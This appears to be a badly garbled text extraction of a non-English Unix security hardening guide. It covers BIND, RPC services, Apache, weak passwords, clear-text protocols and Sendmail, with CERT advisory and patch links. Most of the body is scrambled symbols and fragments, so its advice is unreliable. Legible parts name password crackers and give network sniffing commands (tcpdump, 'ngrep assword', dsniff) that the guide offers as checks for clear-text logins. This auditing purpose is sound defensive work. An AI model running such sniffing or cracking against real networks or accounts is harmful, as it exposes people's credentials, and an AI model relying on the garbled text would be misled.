3O *
,6 3
BIND "
SL ?@ )
*
1) U#
Ž6, 6 U )
1
&
S
- $() *
, -, < K BIND " *
#
+,
6
? G? &
5 C
P
,
#47
0,< ,6 3
+
)
) K % !
BIND "
- 5
6Patch 2 3@ " - Y
K
? 59 BIND *
?@ "
" - Y 7
SL BIND #
5 %
S @ T5 / $,< -,
Patch %
, 6 3 j 5 X.Y.Z 7
Level Patch
)
?@ )
"
?@ ?
)-
, N
2 3@ "
H
0
)
Z) *
Symantes
6 @
-,< ( N
N 4
- Y & $
I
" ?
R4 S @ ^
d *
P
3
$
0 < ,6 3
4
"
BIND
bP
)
-,<
F)
R4
W L3
Y$ B
-,6 X
*
N
4
2 3@ 0 5 SL
#
5
2
'
ISC
>! $ BIND
6-)
0
I 5 DNS
R4 S @ ^
*
2 3@ $
6, 6
6
! " %&
a
/
-,< SL BIND *
F
6 #) "
-,<
2 3@ SL "
-, < K BIND *
N
,1 b
0 5 %
*
7 K
&F -, 6,
Version 9.2.2 v
bP
-,< SL
X !] -,
5 ,H
Q
L
ISCb
'
)-
6
-, 6,
$
7
BIND #
^
:
?
(N
/ ? 59 BIND *
("c 7 !89 v named a
0
3 *
( E _-,
dInternet Sofward Consortium :ISC
! ". /0(123&
%
nH
456 123&
DY/ I 5
)
•
l89 & named ?@ ] BIND deamon ? 5 TG' g
_
N 4
I 5 0, -,
BIND &'(
'
?
DNS -, 6 U )
I
? G
_?@ ,E ? 5 TG' I ] W 3 7
K6
u 3
0 5 MR/ 6
)? ,
,1 b
6Patch -, 6 U )
-,< K
B5# 7 !89
'
0, 6 Z
Checklist j* ) CERT
"
*
N
(N
2 3@
" BIND
-,< K 7c
T5! "
) "
•
I5
?@ ?# 7
2t
5: SL
:
0, K5 - Y $ UNIX Security
Banner
^
g *
j 4
)
785/ ? 5
BIND GH ) *
- 5<
-, ` 4
) MR/ BIND "
•
I5
Version String
0, K5 2 &N F _ named DNS servers) % '
DNS
[? , 6U)
Zone 7c
Zone 7c
C
'
T
GH )
•
?#
? # _secondary DNS servers], K5 6 'Domain
^P
Child ) Parent
^ P
? # " %
) T G'
g
0, K5 - Y _Forwading] y
#B
5! %
DY/
6 Domaion
R )] Delegation
) ') _ 1t
•
glue fetching ) Recursion ? #
I5
0, K5 TG' g DNS Cache i .
5 ?
H
. ) named" " - Y
[
non – privilage
:
? G BIND 2
Privilage h @ " BIND 9 - 5 < *
DY/
, K5 ),.
•
I5
BIND $
Z F Chroot
0
0, K5 - Y http://www.losurs.org/docs/howto/Chroot-BIND.html h @
BIND -, < =
R4 S @ ^
bP )
3 785/ %
DY/ I
a 5 - Y
h @ " ISC
BIND
0
h @ " ISC
0
:
Dos
R 4S
@
" ?
:
•
- Y http//www.cert.org/advisories/CA-2002-15.html
BIND
- Y
9
"+
8
:
DoS
R4S
@
: 2,
http://www.isc.org/products/BIND/bind-security.html
•
6
)
BIND
25 SL
I 5 ("c 7
4" - Y ) 6@
) Running the BIND 9 DNS Server Securely a h @ " ?
0 5 - Y Afentis h @
$U c
-,< K 7c
<@
Remot Procedure Calls
(RPC)
K62 )
F
H
B
5! - N F
F
0, <
U)
( E
K
I
" )-
T
n 9 " ()
?@ " - Y RPC
- Y NIS ) NFS % 'V < $ ) - "
,
I #P
< -,< +"
6
; G RPC
,G
6=GX
F)
6U )
Q
RP @
? 5F
RPC
6" E
6
" - Y
T % ) ) 1999 T
RPC
,G
RPC " - Y
6
T) ,
I
?@ "
f
F
)-
T 5G ,/ " j
0,
)
H"E
@
=GX
S
DoS \ " 785/ Q
R4 S @ : )
: %1
, $ #
g F
I
F) & C 3 0
0,
i:
& @
' )-
y
6,
-,< =
-
785/ 8Q
RPC
\ ' 7 ")
6U )
RPC DCOM
;! "), )
?@ )
U
R4 S @
^
- $() *
-,< SL RPC
F
2000
^P
:
#
ZF
3 M ,6
K6
-
(
2, ,
0, < , 6 3
=GX
6
-,< YB* 785/
+,
1
) U#
6*
5
0, < P , , e G
! ". /0(123&
"
# Z F" ?
$ rpcinfo"
a,
RPC
Program
)
- @
R4 S @ ^
)
N 4
" - Y
RPC T) ,
6U )
RPC SERNIS
Number
100083
Rpc. Ttdbserverd
P!
Rpc . cmsd
100024
Rpc.statd
100005
Rpc.mountd
100232
sadmind
100235
Cachefsd
100249
Snmp Xdmid
buffer Overflow 785/ n 9 " C 5! RPC
H- Y Z
6-
100068
) 6:3 W L3
' ) ("c
? # 2 $ Buffer overflow
R4 S @ ^
_O * , 7 L SB
g]
j4% H
) Z:3
:
, <P -, "
b
RPC
, 5
F
, 5 T
, B ) h / K6?#
O * , Overflow & @
1
" E
RPC
g-
F =GX
4 - Y
6U )
l ' R4 S @ ^
( E ,!
"
" ,G #
" & @
0, 5
2
6
- Y
4
) X
RPC
"
$
I'/ ?)
1
-
6U )
"
K6U )
:
.
"
Z F% !
Z F T 5G ,/ " j
g
6
?# ,
456 123&
P%
DY/ I 5
•
6MR/ ) ? 5 TG' g
0,<
F) ? @ MR/ ?#
$-
, 5
F
) - " )"E
RPC
) )
6 'F
! " %&
a
B
! 0,
b
' F
' - Y ,
6'
6U )
5 #P
< )
?@ "
•
-,< K Patch 2 3@ SL
a
0
- Y _http://sunsolve.sun.com ] h @ " U c
http://www.ibm.com/support/us
0
a h @ " IBM
,
&'(
AIX
- Y http://techsupport.services.ibm.com/server/fixes)
) http://www.redhat.com/support/errata a h @" U
0
7
L
http://www.debian.org./security
- Y
Patch 2 3@ SL ) 6 @
9
1
I5 E F7 B
5!
0 <( E 5
135 7
4 ) RPC
portmapper
0, 5 V8 T) ' )
UDP ) TCP
, K5 V8
$ l ' J) "
785/
5 %
785/ "
3
B
^
32789, 32770 Loopback
6
DY/
windows
) i:
^
B!
_ UDP ) TCP] 111 7
^
)
F
c $ KF
F
[
g
B! ,
g
4
5
4
4
_UDP ) TCP]
67 4
? 5 TG'
" - Y 0, 5
5/
1
) - PBuffer overflows
0
TP
" %/
NFS % ' 6
$
,
^P
a
6
P IP/ ? & " - Y
1
, 3 b'7 L
R4 S @ ^
- Y
"
6h @ " ?
RPC ^
% ' 6
j 4
:
,
#4
nfsbug" " - Y
B5# 7 !89 R 3
a 5
http://www.cert.org/advisories/CA-2000-17.html|http://www.cert.org/advisories/CA-1999-05.html
http://www.cert.org/advisories/CA-1997-26.html
http://www.cert.org/advisories/CA-2002-26.html
http://www.cert.org/advisories/CA-2002-20.html
http://www.cert.org/advisories/CA-2001-27.html
http://www.cert.org/advisories/CA-2002-25.html
http://www.cert.org/advisories/CA-1999-08.html
http://www.cert.org/advisories/CA-2002-11.html
http://www.cert.org/advisories/CA-1999-16.html
http://www.cert.org/advisories/CA-2001-11.html
http://www.cert.org/advisories/CA-1998-12.html
http://www.cert.org/advisories/CA-2001-05.html
http://www.cert.org/advisories/CA-2002-10.html
http://www.cert.org/advisories/CA-2003-10.html
http://www.cert.org/advisories/CA-2003-16.html
http://www.cert.org/advisories/CA-2003-19.html
Apache Web Server
0
)
5
O) ? , 6 U )
78#
(A-2002-,CA-2002-2717]
-
a
3W 3
R4 S @
6 ' " 7, ,
F)
& PHP ) CGI
0
bP
!
?@
)
4@ -, 6 U )
_DoS] U )
h / 6-
-)8!
6 „1#
& O) -, 6 U )
" $?@
4@
? `56 1
) <
R4 S @ ^
R4 S @ ^
F) 7
# _Apache]
O) -, 6 U )
4@ , ) 6T)„
3W 3
R4 S @ ^
"
4@ $ _IIS] ' #
) %K
0
6=GX
2 1
),
? 5 TG' g
) 6% '2 3 , - 9*
)j 5
) - " -, 6 U )
_
3)
#
] -, 6 U )
? '- 9*
$() *
,G )
e '7 L
4@ $l '? #
, 5
- Y "), )
3 W 3 R4 S @ ^
4@ 0, <P
-)8! 0
4@ Z F
SL $ U
I =B*
B!
,
&
H U#
6
1) U#
"
4@
+,
N
6*
6*
&
)
5
"
"
?
" \ 2 0 5 SL &
0,<
+
4@ SK-, 6 U )
R4 S @ - . W L3
("c 7 !89 S
a 5 - Y
h @" ?
! ". /0(123&
"
6@
I5
6h @ " ?
$
Apache 1.3.x
:
•
http://www.apacheweek.com/featurity/security -13
h @" ?
Apache 2.0.x
| http://www.apacheweek.com/features/security-20
•
R4 S @ d *
ah @" - Y
- .
I 5 ("c
0, < P
'7 !89
G X) Z
W
0
"2
,Y
$-,< - <
6h @
("c 7
4)
L3
& http://httpd.org/
! " %&
a
K
"7
4$
456 123&
4@ O) -, 6 U )
DY/ I 5
•
-,< K patch 2 3@ SL " ? 59
"
6 @
http://httpd.apache.org h @ " ?
I5
:
2
0 5 - Y levels Patch ) 6 *
h @" ?
$
4@
Q code Sourde
6*
6Patch 2 3@
-, < K
I5
http://httpd.org/download.cgi
0 5 - Y
h @" ?
GX) 2 3@
'
) 6 @
I5
0 5 - Y | http://httpd.org/dist/httpd/patches/
" ?
$
4@
6*
code
Q
Source
I5
0 5 - Y http://httpd.apache.org/download.cgi h @
h @" ?
6Ptch 2 3@
-, < K
0 5 - Y
- Y ? @ " +F ? G
#B
5!
mod
.
I
4@
(
R4 S @ ^
"
("c :
("c 0,
-
"2
% 5
2
4@
)
)
$ I 2,
),
) X
6-"
.ZF
5 _CA-2002-27] –ssl
%
- 5 - Y SSL
O F$
? G
4
E " E %H ,/ W 3
0
4@
0 < ,6 *
$ chroot
Login
8Q 0
C
/
0
)
- Y
•|•
G',
c
0, 5
$ -, 6 U )
0
6)
I5
! patching " ? 59
,B
6T)„ C
'
- < # 2
Open
) 6 @
http://www.apache.org/dist/httpd/patches/
% !
) X
'
F"
l '-)
,E = G ;!
B 4 Chroot
) •ROOT
, E = G;!
? G,
Chroot 0
session
F
6% '
5 -,6
F W L3
H $, 5 , 4
6
),. $ l '
) E $ /chroot (
U)
4@
?@
F
3
G',
- <&
S
I 5 O) -, 6 U )
0,<
&'(
0
- Y
)
7,
F 3
*
"
9
1G'W L3
, 5
3
0 '
#
("c
?@
K loggingW L3
'# < ) [
U)
:
6% '
6 '? @
a 5 - Y
g
'
6T)„
I
)
, "
S
?@
I5
B
"+
" ,
6A)
? G$ I
I5
) -, 6 U )
g
) R3
4 ) 6 BH $
logging 7 B
5!
H
)"E
B'
,G
("c 7 , 5 ? @ &1 @
6%
1G'\
4@ -, 6 U )
("c 2
6
0, 5
?#
4
, ?# S
•c 7) Y
2, 0
6
6
6U)
,
F 7 !89 " W 3 I
) •c
!89
!89 +P
2#5
W L3
3
4@ Chrooting
("c O) -, 6 U )
R4 M :G
7 L c
4@ -, 6
6- Y Z W L3
F) chrooting
-, 6 U )
F %K
15 /
)
K W L3
6 ,'
5
F) chroot " z 3 ) % !
+
P ) <
6 #6
6U )
?# $, 5 " g@
P F7 [ ,
9P
3
0 5 Z F chroot b.
?@
b.
< TP,
"
H /chroot/httpd
("c 0, 5 6 '
B
:
)
F & 7
2, 0 < , 6 *
^P
,6 *
I
6j*
# 2
CGI,PHP
0, @
4@ #
F
c
2
0
1G') Z F chrooted 7 L
'#
-)8! 0
W 3^P
>
P l'
S
),.
:
8Q 0,
C
5<
'
6 '$-, 6
<
K<@
(E
< @ •c
I 5 0,< ,6 3
http://httpd.apache.org/docs/logs.html h @ " Apache 1.3.x
0 <- Y
http://httpd.apache.org/docs2#5 -, @ j 4 b <
F
h @ " Apache
)
)Y
2.0.x
0 < - Y 2.0/logs.html
) CGI , PHP " #
?
)
•c
<
P
[
l ' GX) 0,<P '
,,
$
( ,H $
- Y Π#
=GX
POST ) GET
W L3
S
j< 4
0, 5
6 'O)
6% '
("c
&1@ ? j &' I 5
)
O) -, 6 U )
- 56 l '
^ P
0, 5
6
_detection Intruder] 25/&
N 4)-
6
^
mod_Security n 9 " ,
R 47
6
.
6 „ 1#
7 B
5! ? 5 •c 0 5 POST ) GET
bP
O)
P
" - Y Z ) F
ModSecurity
d *
•c
F
5/
0, 5
"
K
N 4
F
" $ ModSecurity
4@ -, 6 U )
-http://www.modsecurity.org/
-http://www.securityfous.com/infocur/17064.152.44.126%20152.44.126
a
#
4
N ],
Z
"
5 T G' g
I5
,!
#
, 5
F
2
6? "
0_,<
<
F
6 ' Apache User Id
H
, 5
6 '
User Id
F
:
,F
)
- Y 7
#B
5! - .
K<@
,
- 5
- Y
4@ . 6
? # 2 SuEXEC
4@ ?
. CGI ) SSI
) 6@
P
I5 ) :
2
a 5 - Y
"
/
6
2 , 0 , < O) -, 6 U )
L 3 CGI )SSI
-, < <
,< ("c j
3 $ setupid Root
$
User Id
%
b
" - Y
) X #
7, , S
0, < , 6 3 MR / $ ? 5F
) X
SSI
?@ ( &1) -, 6 U )
P 7) Y User Id
" - Y
- Y )
F) ? @
) PHP,CGI,SSI "
F ) 2 < ?# ) j6
;!
) PHP,CGI,SSI
F ? # $ SuEXEC 0 < - Y SuEXEC "
3 'P
9
")
) SSI,CGI,PHP
#
Server Side Includes
3 ,
6? "
06
#
",
0, K5 TG' g
#
:
SuEXEC
(
3 <) S
0,< ,6 3 N
6h @ " ?
6
,
# 4 (,!
6- Y/
SuEXEC "
http://httpd.apache.org/docs/suexec.html h @ " Apache 1.3x
0 <- Y
http://httpd.apache.org/docs- h @ " Apache
2.0.x
2.0/suexec.html
0 <- Y
) cgi- bin
6
0,
MR/ $
5 e 'j 4
B / " S1:
. W L3
6
#
F
a
5
HTTP header
("c ) ( E 6
l '\ X
40PHP "
23
- < W L*
("c
5 )
7 !89 K ; !
C
'
6
)-
#
% <
25
z 3 1 2
4 ? 5 T G' g
a
B5# 7 !89
safe 1/
'
PHP
h @" ?
W
8Q 0
C
G X)
P
I5 ' X
0 < Corss Site Scripting XSS %
h @" ?
L3 2
http://www.securityfocus.com/printable/infocus/1706
0 5 - Y
T)„
W
L3 2
"
,G
mod_Security
B5# 7 !89 -,6
Injection SQL&XSS % < R4 S @ ^
0 5 - Y
1
)„ " - Y
DY/ ;! ,
0 5 - Y
&'(
F " ? 59 T L.
#
:
) &5
2
0
56 &K/ &
# _ http://www.cirt.net/code/nikto.shtml h @
0
<@
http://www.modsecurity.org/
6
6& " ?
)
CGI
% H] Nikto
)j 4
6& 2 P
,Account
2N P
2
9P % G
$?
,K
,6 3 N
$?
6
<)
6, )
Q0
b
,K
f ) T) ,
-,< K
P!
6&
$
C
5
e *f 2N P
<) $ P
!& " - Y
!89
$-
6
)?
) % ' DY/ I
?@"
0
6) 6 '-,< d *
,6 *
E +
+
?@
" - Y
?# $?
H $-,< -
P
, K " U4 0 <
6" E ) 7 "
F
$
-,< , K +
?@?
"E
1G'$
SB
g
$
-,< , K +
?@?
"E
1G'$
SB
g
, KF) ,
?@
(E
DZ
H$
E
N`6?),
)
?@ =GX
)
)
/j
)
R
0, < ? "
b
P
!&
:
P! &
^P
< TP,
-,< K
6account
Y
6%
4"
75 I
#
u
P!
F)
2
) X$ 5 - Y
, N) = G 0 <
3\ P ? "
€
+
"
? "
% < P
!&
•
-,< = G Account
P
!&
6&
" ?
S
•
DY/ (,!
0-,< = G
, account E ?# $ F
,H ') = GX
6 &'(
4
5! , B
<R hashing
, "
-,< & ) -,<
N -, @
DY/ 2
N1
S
P
3
h
83 ( '$ hash ,
/
< ,6 3
SB
g
F) 2
)b
P! &
•
N1
$ hash
)E $
-, < 3 < $_
?@ ,6
•
6'
P! & Hashing
) ) ,
, Hashe ,
0
N& ]
P
!
)% !
0, 5
,
/
B
5!
-)8!
+
2 1
), ) 2
$
,
6-, 4,
-, < 2),
" I'
6 1G'
P
! & ,H ' ) = GX account
P
! & ,H ' ) = GX
6& ( #.
-
<
\ ' i: 21
)
a
0
•c
H ,F 7 , , e G
- 5 account
R4 S @ ^
,6 3
!89
0,6
,F , , ,
% !
9
" )-
) -,
) , K " U4 ? @]0,<
0_
F ) -, < = G
U 4 ,<
1G' #
,
P
!& 2
" U 4 ?5F
,63
P
[?@
, -,<
P
! & 2'
+
H
5 $
?#
3 1
)
- 3•
6% 5G1
$ F
?@
-
, 5 ,H
6& " - Y
0
P! &
)d*
7
P
!& ?
"
S
d
GP$
P! &
) ( #.
2
= G
W L3
("c
! ") *
) User ID
&
h
?@ ?
,K, @ '
0
?
) ,G ?
$, 5
DY/
,
2
P
!
6account ,
, ,F
? "
F
<d *
6 'F
)
"
- Y
<
,
) " g@
S
P! &
# )-
b
hash
) 6 'hash
d *
?,
N ], 5
I 5 MD5
crypt 5 , H
• Y%
P
!&
?
?@ "
:
5 $l '
,6 3
%.
?
, K ?#
"
etc/shadow % '0,
P! &
"
2
0_,
(E
? 5 -
3•
6
2
1
&
!89
6% 'V <
K6U )
I5
- 3• I 5 etc/shadow
u -,
N10 5 - Y &
SL b
P!
l'
6& ? 5
0
I 5 -, < + "
H
("c
- 3•)
hashes
N1?
0
3 A8 $ cracker
C
'
- Y hashes
S
4
/etc/passwd % '?, 3
F
3 % H root
3
- 3•W L3
?, 3 ?#
) 2 #<
N1" S
"
5 b
6account #
B
.
b < #
P
!&
) /etc/passwd
F) #P< ?
?5F
)
? "
#P<
I 5 ? 5F
5 L hashes
/etc/shadow
BH 0, <
b
P! &
P
!
! ". /0(123&
) -,< <R V <
!89 +
)
,<
K6account " #
- Y
6& " ?
'& , < h, / % H
6
,6 3 , , 2 e G
<
#40
+,
)% !
+
H
("c
25
d[Network Information SystemZ NIS
,
NIS
/
0
! 5E % < ) 6 '
#P
<
,G
,
(Mapping) U )
?#
7 !89 ) - 5 %5! 6U )
H Network File System (NFS)
, 6,
hash
P
!
P
!
% < NIS ,
6&
#4
6& C
85! ) 6 '?
) NIS+
P!
* ]l ' 6*
,
%#
),
!89
I #P< 6U )
3
6
? @ ?, 3 ?# ,
- 4 , ,F 6 *
6&
"
6% '$-, @ %5G / 9
5
I $ NIS " -, < "
N ], <P hashes
F
^
("c ^ P
2 )-
0,
H,, e G
C 5! LDAP
("c ( #.
# 4 ) I 0_ ,
u -,
?@" - Y ,
F
SL b
l 'b < #
2 56) -
%#
$_, ,F 6
0, 5
-, < "
,6 3
F)
F) $
) etc/shadow b
47 #
'
b
P
!&
=GX a I
- < $, - 5 V
5 ,H ?
j4
- Y
N ,G
3
$l ' # ) 0,<
1
), 5
? ,
0, 5
- Y
:
c 5G
C
6U )
#4)
)S
P
!
) N
("c
4 5
6
GP $
- 5
6&
7
L
" %/
P
!
6&
=GX %
<
SF
("c
? , b
0? "
%
)=
! 5E SL
g
6U )
, <P
456 123&
6%5G1
G?
a,<P S
"
P
! & ,H '
\'2 P
5/
6
e '
! " %&
"
$ 5
SL 7 B
5! #
) X
)
6
"
)% !
K6account )
6account
("c ) - 5
6U )
<
6? "
#P
< )% !
b
2
g
)? ,"
%
,
^
2
9
/
I'.
:
6A) " :
) X g
L
6&
?
< TP, &
) = GX e 'j 4 7
P!
) h, / ? # $ ,
account ? 5 TG' g
^
$ #P< )
! 5E
6& d *
3? "
6SL 0
,
P
!
hashes
)2
-
b
#.
5#.
? @ ( #.
K
S
&' * " - Y
?
P
P
!
d *
N F- 5
$, < -, < 3 < 5B
A" @ $ 6? "
?@
)-
-J )
"
3?
6
P!
!
M) / ) ,!
\X
)
5 $O 3
P
!&
?
("c
2
I 'L
c 9 <
6&
P
"
%5
Q
O*
N F2
0 <-
0 , K5 = G 3
-,< 3 < (
B' (
) " )@
( $O
W 3
(E
*
-
93
?@ d *
$
&
" $ "
" U
(8!
6&
,1
<P?@
"
I 5 ("c % 5G1
" ?
T
("c A"
6 #) h
&N F
E
P 785/ ?, < F
7
H?
-
- < # 2
?@ _
H I
("c 0
)@
?"
2 ), " U 4 0_‚
, P4
) 4 " ? 59
]
" ) -,<
1
) K5 - 3•
-, < F
I5 ?
I5
@
? !$7 P
!
6&
3•" M, 6] , <P %#
$ -, < = G
6 % 5G1
P!
P
!&
" ) - 3•
P
!
%5
#
/
) 5B
E ) O * W L3
5 MR/ $ 5B
-J)
password
d *
6&
P
= G
_pa$$w0rd], 5
-
6
-,< Y
P
!&
$_
-J ) M) / ) KP
Y1M) / "
("c
Y
3
M) /
• ,G
6&
O* ,
,
0_? @ =B*
P!
$ 5B 6M / 2 1
) 2' ]
)
#
:
0, < ,6 3 crack $
0,< -,< h PH
(E
],<
"password" (
K6
P!
SB
g 0
= G - . W L3
2 ?
H&
"
6
P
!& 2
M) / % ,P ( ,H C
'
A)
6A) " - Y
,6 3 785/ " \ 2
KP
Y1M) / "
I5 ) - 5
)6? "
?@
" ,G 0
' ? "W L3 )
P
!& d *
" - Y ) ,G
•
" ? 59
6?
' T /2 !
<) "
S
) ( #.
P
!&
7 B
5! $ & @
P 785/ (
6
6& ( E
0 5 crack
2
P
!&
$
T#<
A" @ ) S
,G
PF 62 )
T 5! " U 4
P!
6&
.
2
& 2
0
% 5! " U 4
P
!
6&
Npasswd " ,
6
U
: -, < d *
6 *
6
0, 5 - Y
. 7
]Cracklib " ,
*
?),
? ,
- <\ X
)
6
P
!
$
I5
I
#
0, 5
F) Enabled
,
crak ?@
6&
1/ Cracking
C, E
P!
("c , <
5 $? "
,<
P
'7 B
5! ?
("c
6" E
0
( E -, <
6&
("c
v 4
& _ E
2
"
6&
O * - . W L3
+H ) F
u
5 John the Ripper , (4lc4)10 phtcrack version
K6
P!
7
6&
? G ) stand-alone
- Y cracking
" - Y $= GX
b
& PAM-Enabled
P
!
2 )
u
P
!&
#P< )
L $
P
!&
%
7
K " U4
?
" ,
"
DY/ 2 <
Q0
6
N
" U4 0
5
b
6% 5G1
I K6 & " - Y ?#
? , " ("c " E S
S
6
- Y -,<
?
) Npasswd
5
l' 6
) ("c
F
N656 I 5 ("c
,
PAM-
S
1) U#
Q 0, 5 - Y
_ Crack
$
E
0
6%5G1
) A & l ' GX)
)C3 0
"]
K ? @
I $?
,K
& S
I5
N
K <)
0
hashes
0
P!
6&
#
0 #.
- Y etc/shadow/ "
F) hashes
I 5 A8 ) hashes
" - Y W L3
\
2 #
- 5 (N
P
!
6&
("c
"
0
3
P :
(E
2
LDAP ) NIS
6" E
$, -,
2 &N F 25
6 & ) 25
9
6" E
- 3•/etc/passwd
) NIS
?,
6
)
$, -,
#
H
6$, <
0
, 6 3 ? @ cracking
6*
5
•
DY/
$,
Z F LDAP
DY/ ? #
6&
-,<
"
) <
25
F) 25
2&N F 25
<,
6 &
g
9
6
- Y %
4 :
- Y MDS
N1"
2
0
- Y
6& ? 5 hash
P
!
5
7 L
N
I 5 Crypt 5 ,H
N1"
0
b
? @
0
DY/ (, ! 7
' ,63
?
$, < , 5 ,H ) #.
H, , e G
A" @
I
2 < (, ! $ N
DY/ ) ,<
P! &
<
4
P! &
" %P
H)S
6&
?
P
!
6&
:
2
0
1E
E
6 N4
W 3 K6 2 ) )
) X
62 ) " 0
V
? "
, ?@
%
has expired
O*
3
K6( 4 2 `
•
P $
5 - Y ?@ "
, account 60
P )
5#.
) , ,F P! &
u 7 ) X ) _ ' L 7 L -,< , 1 ] 1
)
B
1
$ 6 )
'
H
, P4
:
2
)?
)
("c) ( E
^P
P
!
N
1 -,< , K
3 - 56) "
P
!
& log in 2 1
)
,
&
/ ? 59 ?@ ?
# 54
"2
I K6
K6account MR/ )
1 P! 0
B'
4) K T
) T G' g
6account &5 0 < +H ) , Y
)
P! &
A" @ ?
6A" @ ?
U)
:
6&
<-
$, 5
, ,F 6account , # 4 0,<
?
b
%L
K ("c
- Y ?@ "
DY/
B
.
SB
g 0
("c 2
) " ?# 7
0
6&
P
!
, account 60 account
P )
$?
, Y 5! ( 5 -, 6,
'
0
MR /
P
!
?@ ?, 3 ?#
?
/
P $S
K (,! 0,<P
F
$
6&
6
B
5F " , -,< - 3•?@
P
!&
U)
% <
F) ? N
Your password
3
F
B
5G1
, <P
= GX
? "
("c
'
P
!
6&
)
P
-,<
6account ? )&' I 5
- 4 $,<
(N "
5 ?@" - Y
3
nB
G account MR /
0
"%
I
'
3
- Y $, - 5
Clear Text Servies
7
L $ U#
$
P
N&
=GX 0, 5
?#
P
!&
6
-,< - Y
5 - Y
?5F
3
6-
I?
telent
) FTP
bP
7 !89 d *
2
2
F
?# $S
? 5F
b
N
)( d *
0 , <, 6 3
Clear 7
2
_
L
7 !89
text plain
" )-
,
b
!89
SL
<] -,<
U#
< ?#
b
' ,B )-
6
"
R4 S @
)@ +5F
a,6
3
6N
6-
#P
< 6U )
?
,
) ))7
L $ -, 6 U )
-,< -
.
_login 7 !89 ]
$ F
<d *
0, 5
!89
I 5 8Q 0 )@ , 6 3
, 6 3 plain- text 7
!89
" ,G
) -,< E ^ P 7
6v 4 ) ? ,
6'
,5! ) - Y
$
sniffer
-, < K
2,
SB
g 0
N&
h / 7 !89
) #P
<
6U )
"
) 6 ' _ #P< ' -,6 ]
bP
B
.
#P
< 6U )
"
_
)
N6 ]
3 785/
)
6
P! &
3
1 " T),F
$, 5
1P $ Text
U)
Clear
7 4
Clear Auth
1
@
Content
FTP
21,20
Yes
Yes
$2
TFTP
69
Yes
N/A
$2
telnet
23
Yes
Yes
2
SMTP
25
Yes
N/A
$2
Pop3
110
Yes
Yes
$2
rlogin
513
Yes
Yes
2
HTTP
80
Yes
Yes
$2
?
6, K
, 6 3 TP,
?
^
2 c
h /
F$2
6-
FTP ) Telnet
I K6U )
T
L
7 !89 $ , <
" ,E - Y
2 7
,
6U )
< TP,
b
$
P
!&
clear text 7
,
0, 5 Z F $ , K
F$ ) - "
2
‚ / T3
- Y ? 5F
Clear text
I
?5F
-)8! , 5
? @" - Y
0,<
7 !89 % <
&1?),
%
a I YB* 7 , ,
7 !89 d *
)$
< $ ,L
-, < K
6*
5
Free/OpenBSD j
0, 5
SL
6U )
) 2 3@
^
l ' 6U )
"2
$:
"
3
+,
6
ZQ
6U ) ] l ' R4 S @ : d *
? 5F
b
_sniffer] -, < - Y
6&
5
5
]U
1) U#
$ e 'j 4 7 L $ _,<
+
clear
7
5 ) FTP )telnet ]
T) ,
2
I
",
)
" $-, < K U#
5 0_, <P
)(
3 - *1 7
$785/ ( E
- Y text Clear
<
L 7
$() *
0, 5
0
I 5 A) 2
&'(
! ". /0(123&
2t5: ) 2
[
# $ _text
? 5 T G'- . 0 5 - Y tcpdump $
"2
" 7 L clear text ^ P
a
F
2 1
), 0
6d *
I 5 $l '
#tcpdump-X-s1600
5 - Y & ngrep a
assword
6 ' #P<
-,
'
- .0
I
I N
) sername
6
I W 3 K N1
$ 15 / • & M) /
5 - Y
" ?
"
2
E F ?# $ l '
I 5 $ M) / 21
)] , 5
http://www.packetfactoty.net/projects/ngrep/
0_
"7 L l'
? 5 TG'
#ngrep assword
h
/
0
6-
d *
"2
I5
& 2 1
),
6% # ) 4 )
N \
h @" ?
l
'
? 5 TG'- . 0 5 - Y
:
2
$ Dsniff 0 5 - Y _ P
!& )( ]?
P! & ) ( z)"
? @ $ d . " U4 ) ( E
6& " ?
5 W L3
("c
POP3 ) Telnet )FTP
? )@
$l'
I $ E/ Plain text
,
0
, 63j
5
http://www.monkey.org/~dugsong/dsniff/
a
"7 L $l'
#/usr/sbin/dsniff
! " %&
level•Link
,
,<
N& %H ,/ ) End- To- End
N, # T G
•$ 7 # )
connection
6
N&
BH
m .1" 6%# ) 4 3
N& " - Y
+H ) , Y
?
$,<
5
_tunneling]
h
SSH
% H]
) Z F U#
)(replaces
6*
R 4 M :G ) T) ,
Q
l'
-, < "
- 4
5
I]
N&
( E SSl
OpenSSh
_ http://www.openssh.org/ h @
telnet,rloging,rsh) ) - " 7 9P
0
"2
_ HTTPS , POP3S
K6% # ) 4
) $ SSH:Secure Shell n 9 "
0
456 123&
- Y X11 )(pop3,SMTP
I
?@ " ?
I K6%# ) 4]tunneling
)
0, 6
2<
?
)
connection )
?@ ,
POP3 ? 5 tunnel - .
Z F & SSH
0
"
P POP3 -, 6 U )
a K5
F -,
U)
#ssh-L110:pop3.mail.server.com:[email protected]
- < localhost
7
4$ 6
7
4POP3.MAIL.server.com 7
7 L
# ) #1
# ) #1
4 -, 6 U )
4 -,
U)
$
] TCP110
T 5G T) M83
) 2 < 2 7 9P
5 S
110
2, _
0 (tunneled over SSH) 0,< ,6 3 ( E -,< &
stunnel " - Y tunneling
P
) _ openSSL Toolkit " - Y
0
] "
, * plain text 7) Y
'
N&
T) ,
- 4
6% / - "
N
#
SSL %# ) 4 $ l 'A) 0
6%# ) 4 ? 5 tunnel
0 5 - Y http://www.stunnel.org h @ " ?
I5
?@ ?
l'
'
Senmail
6
? 5
) ') ' $ T
# Sendmail 0
"
? G ?@ "
- Y $
785/ ?
(,!
:
# ) #1
)-
)?
?
- Y U
-
1)
4? ,6U)
- 5
? 5F
5 ,H % 1
, -,< ( E 785/ Q
:
2
-
6
SB
g
#
#1
Mail Transfer Agent 2 1
),
-
3 ?1
$ Sendmail
I 5 ?@ "
- 56
'
# ) #1 6
1
) M ,6"
-
-,6
$-,< SL
a 5 - <
?@
+" U „@
# Sendmail 0
^P
6*
,G
S
3 785/ "
patch
5 2,
CERT ADVISORY CA-2003-12-BUFFEROVERFLOW IN SENDMAIL
-CERT ADVISORY CA-2003-07-REMOTE BUFFER
-
CERT
ADVISORY
CA-2003-25
BUFFER
OVERFLOW
IN
SENDMIL
a 5
-,5! -)
)
?
SENDMAIL
bP 7 , , ) 7 :3
,
, 6 3 BUFFER OVERFLOW ?@
#4)
% , PC
8Q], <
T) \ 7 , , ")
< TP
B
!
7"
PATCHING (, !
) e 'j 4 ,
#4
"
Y 7 GP ,
B % ! 0_ # ) #1 6
S
2'
+"
) 5 ,H
- 1
@ &
6*
6% '" - Y
" - Y
() \ 7 , ,
C,5!
B
B
!
0
$() *
send mail " -, < S L *
0,<
- 5 U#
)U
+,
1 6*
TG'e 'j 4 7 L $l 'U )
+
*
K
)f ,
5 ,H *
-
) '
' j6 ?@
? 5 d*
I
0, 5 - Y
R4 S @ ^
X !
Send mail
<R
HS @e G
"
0
! ". /0(123&
6patch )
